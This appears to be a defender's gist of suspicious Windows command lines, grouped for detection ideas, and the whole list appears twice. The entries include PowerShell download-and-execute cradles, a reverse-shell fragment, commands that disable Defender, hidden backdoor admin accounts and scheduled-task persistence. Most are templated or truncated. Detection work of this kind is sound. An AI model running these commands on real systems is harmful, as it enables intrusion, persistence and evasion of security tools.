JohnLaTwC/ideas.txt

## ideas.txt
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
powershell.exe /c Get-WmiObject  Win32_ComputerSystemProduct | Select-Object UUID
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber

C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"

cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Logs')))) {IEX(New-Object Net.WebClient).DownloadString(...')}"
cmd /c powershell "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event8 Log')))) {IEX(New-Object Net.WebClient).DownloadString(h...
cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('Windows Events Filter')))) {IEX(New-Object Net.WebClient).DownloadString(...)}"
cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('Systems Manage Filter')))) {IEX(New-Object Net.WebClient).DownloadString(... ')}"

C:\Windows\system32\cmd.exe /c reg add "HKLM\software\Microsoft\Windows\currentversion\policies\system" /v localaccounttokenfilterpolicy /t REG_DWORD /d 1 /f

cmd /c schtasks /create /ru system /sc MINUTE /mo 120 /tn <name> /tr "powershell -c '\\\"<domain>\\\",\\\"<domain>\\\",\\\"<domain>\\\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\\\"DownloadString\\\"(\\\"http://$_/<path>?1.1*$env:username*$env:computername\\\")}'" /F & echo %path%|findstr /i powershell>nul || (setx path "%path%;c:\windows\system32\WindowsPowershell\v1.0" /m) & schtasks /run /tn <name>

// detection evasion
cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/ & powershell IEx(New-Object Net.WebClient).DownLoadString(...)

//hide a backdoor account on logon screen
C:\Windows\system32\cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v <account> /t REG_DWORD /d 0 /f

// group manipulation
cmd.exe /c net localgroup administrators <account> /add
C:\Windows\system32\cmd.exe /c net user /add admin <password> && net localgroup Administrators admin /add

// redirection on the command line that indicates multi-stage payload
cmd.exe /c <filepath> > stage1.txt
cmd.exe /c whoami > <filepath>

// use of LOLBAS for post-compromise commands
cmd /c for /d %i in (<ipv4>:<port> <ipv4>:<port> <ipv4>:<port>) do Msiexec /i http://%i/<hex-digits>.Png /Q
WMIC.exe, rundll32.exe, cscript.exe, msiexec.exe, LOLBAS (lolbas-project.github.io)
schtasks.exe /create /tn Miantenance_init /ru SYSTEM /sc ONSTART /tr "C:\windows\<path>\Maintenance.bat"

// firewall manipulation and persistence
cmd.exe /c netsh.exe firewall add <name> tcp <port> DNS&netsh interface portproxy add <name> listenport=<port> connectaddress=1.1.1.1 connectport=<port>&schtasks /create /ru system /sc MINUTE /mo <mins> /st <hour>:00:00 /tn "<taskname>" /tr "powershell -ep bypass -e "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQ…" /F&net user <account> <password> /ADD && net localgroup administrators <account> /ADD

// redteam/blueteam testing
calc.exe
	// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
	powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
	powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
	powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
	powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
	powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct \| Select-Object UUID
	powershell.exe /c Get-WmiObject Win32_bios \| Select-Object SerialNumber
	powershell.exe /c Get-WmiObject Win32_PhysicalMedia \| Select-Object SerialNumber

	C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"

	cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Logs')))) {IEX(New-Object Net.WebClient).DownloadString(...')}"
	cmd /c powershell "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event8 Log')))) {IEX(New-Object Net.WebClient).DownloadString(h...
	cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('Windows Events Filter')))) {IEX(New-Object Net.WebClient).DownloadString(...)}"
	cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('Systems Manage Filter')))) {IEX(New-Object Net.WebClient).DownloadString(... ')}"

	C:\Windows\system32\cmd.exe /c reg add "HKLM\software\Microsoft\Windows\currentversion\policies\system" /v localaccounttokenfilterpolicy /t REG_DWORD /d 1 /f

	cmd /c schtasks /create /ru system /sc MINUTE /mo 120 /tn <name> /tr "powershell -c '\\\"<domain>\\\",\\\"<domain>\\\",\\\"<domain>\\\"\|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\\\"DownloadString\\\"(\\\"http://$_/<path>?1.1$env:username$env:computername\\\")}'" /F & echo %path%\|findstr /i powershell>nul \|\| (setx path "%path%;c:\windows\system32\WindowsPowershell\v1.0" /m) & schtasks /run /tn <name>

	// detection evasion
	cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/ & powershell IEx(New-Object Net.WebClient).DownLoadString(...)

	//hide a backdoor account on logon screen
	C:\Windows\system32\cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v <account> /t REG_DWORD /d 0 /f

	// group manipulation
	cmd.exe /c net localgroup administrators <account> /add
	C:\Windows\system32\cmd.exe /c net user /add admin <password> && net localgroup Administrators admin /add

	// redirection on the command line that indicates multi-stage payload
	cmd.exe /c <filepath> > stage1.txt
	cmd.exe /c whoami > <filepath>

	// use of LOLBAS for post-compromise commands
	cmd /c for /d %i in (<ipv4>:<port> <ipv4>:<port> <ipv4>:<port>) do Msiexec /i http://%i/<hex-digits>.Png /Q
	WMIC.exe, rundll32.exe, cscript.exe, msiexec.exe, LOLBAS (lolbas-project.github.io)
	schtasks.exe /create /tn Miantenance_init /ru SYSTEM /sc ONSTART /tr "C:\windows\<path>\Maintenance.bat"

	// firewall manipulation and persistence
	cmd.exe /c netsh.exe firewall add <name> tcp <port> DNS&netsh interface portproxy add <name> listenport=<port> connectaddress=1.1.1.1 connectport=<port>&schtasks /create /ru system /sc MINUTE /mo <mins> /st <hour>:00:00 /tn "<taskname>" /tr "powershell -ep bypass -e "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQ…" /F&net user <account> <password> /ADD && net localgroup administrators <account> /ADD

	// redteam/blueteam testing
	calc.exe